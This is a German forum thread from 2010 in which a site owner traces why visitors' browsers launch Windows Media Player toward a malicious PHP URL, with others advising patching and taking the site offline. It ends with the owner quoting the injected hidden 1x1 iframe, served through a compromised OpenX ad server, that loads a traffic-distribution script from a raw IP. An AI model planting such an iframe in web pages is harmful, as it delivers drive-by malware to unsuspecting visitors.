Forum gehackt? WMP will helpctrall.php öffnen

WA24

WA24

Mitglied
Hallo Ayom-Gemeinde,

ich weiss grad mit meinem Problem nicht weiter.
Google kennt das Problem noch gar nicht.

Wenn ich mit dem IE die Forum Startseite betrete, wird ab und zu der Windows
Media Player geöffnet, der dann versucht eine php Seite zu öffnen.

Ich finde im Code des SMF aber den Verursacher nicht. Könnt Ihr mir helfen?
unsure.gif


Mein Forum: hddp://www.vwteam.com/forum/

URL die WMP versucht zu öffnen:
hddp://194.8.250.227/rp/helpctrall.php
(bitte mit Vorsicht, ich weiss nicht was dahinter steckt!)
 
Ich kann dir nur sagen, dass die Seite CODE http://194.8.250.227/rp/helpctrall.php
aus Paraguay kommt, und Firefox sie als attackierende Seite erkennt.

Als ich dein Forum besucht habe, ist mir auf die schnelle nichts auffälliges ins Auge gesprungen.
 
Grundsätzlich heißt das, daß dein Forum irgendwie gehackt worden ist.

Bei Heise gab es neulich mal einen Bericht, wie verschachtelt so etwas sein kann.

http://www.heise.de/security/artikel/Tator...st-1017983.html

Also solltest Du dein Forum offline setzen, bis das Problem geklärt ist.

Zweitenst heißt das, daß wahrscheinlich irgendwelche verschachtelten JavaScript-Codes eingeschmuggelt worden sind, so daß sich mindestens eine Lücke im IE ausnutzen läßt.


Das wiederum kann heißen, daß es entweder eine der ganz neuen, noch ungepatchten Lücken ist - eine .lnk-Lücke kursiert derzeit.

Oder daß es (sehr viel wahrscheinlicher) eine der alten Lücken ist und dein Rechner nicht gepatcht ist.

Also den PC patchen.

Aber: Erst das Forum offline nehmen - damit sich nicht noch mehr Leute infizieren.
 
Danke.

Ich sehe aber leider gar keinen fremden Code-Schnipsel.
Wie kann dann diese URL im WMP aufgerufen werden?

Mein PC ist immer auf dem neuesten Stand.
Das Problem taucht aber sowohl daheim (Windows 7, IE aktuell)
sowohl auch im Geschäft (Windows XP, IE aktuell) auf.
Logisch. Es liegt ja auch an der Internetseite nicht an einem PC.
 
QUOTE (WA24 @ Sa 24.07.2010, 19:02)Ich sehe aber leider gar keinen fremden Code-Schnipsel.

Da wird irgendwo JavaScript eingebunden:


CODE <script src='irgendeineadresse' />


Und dieser Code lädt womöglich den nächsten JavaScript-Code von woanders nach.

Lies dir den Heise-Artikel durch - das ist durchaus ziemlicher Aufwand, das rauszufinden, über welche Ecken der Code nachgeladen wird. Dazwischen gibt es dann ein paar 'verschlüsselte' Abschnitte, so daß man das nicht so leicht findet.

Das könnte eventuell auch ein object-Element sein, das den Mediaplayer direkt anspricht.


Abgesehen davon: Was der JavaScript-Code konkret macht ist eigentlich völlig egal.

Du wirst auf deinem Server ungepatchte Software draufhaben. Die mußt Du patchen. Sonst nützt auch das Säubern nichts, sonst ist das sofort wieder drin.

Und es kann die Datenbank infiziert sein (bsp. per Sql-Injektionen). Das muß nicht in den Dateien niedergelegt sein.


Ich kriege täglich Hackangriffe gegen OpenSource-Software (phpmyAdmin und alles mögliche), serienweise - 200 Urls auf einmal.
 
Das leuchtet ein. Den Artikel hab ich schon durchgelesen.
Das ist kompliziert. Habe auch schon im Google WMT
die Seite durch "Aufruf wie Google-Bot" gemacht aber
auch nichts auffälliges gefunden.

Alle grossen Scripte sind auf dem neuesten Stand.
Für kleinere kann ich natürlich nicht bürgen.
Aber wie finde ich das jetzt raus?

Ich müsste wissen welches Script oder welcher DB-Eintrag das verursacht,
damit ich es patchen oder löschen kann. Muss ich da ne Firma drüber
schauen lassen oder wer kann mir das sagen?

Ich komme ja offensichtlich nicht weiter so.
 
Hallo WA24,

mein Virenprogramm sagt:

Enthält Erkennungsmuster des HTML-Scriptvirus HTML/Malicious.PDF.Gen

Gruss

edvschrat
 
Das Rätsel ist gelöst und wird wohl auch noch einige andere Webmaster betreffen.
Die fehlerhafte Script ist OpenX. Ich habe einen Beitrag dazu eröffnet:

http://forum.openx.org/index.php?showtopic=503482161

Mit dem Banner zusammen wurde ein Iframe nachgeladen:

CODE <iframe src="http://85.234.190.12/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>


Ich hoffe damit anderen helfen zu können.
 
Danke für den Hinweis.

Ich nutze OpenX nicht, kenne das auch nicht.

Aber das sieht doch nach einem 'ziemlich großen' Anbieter aus.

Toll - wenn so ein Anbieter vergifteten Code verteilt, dann sind natürlich alle Seiten betroffen, die das einbinden. Die verteilen dann unwissentlich Schadcode und können zunächst eigentlich bloß den Code ausbauen.
 
Sie müssen sich einloggen oder registrieren, um hier antworten zu können.
Zurück
Oben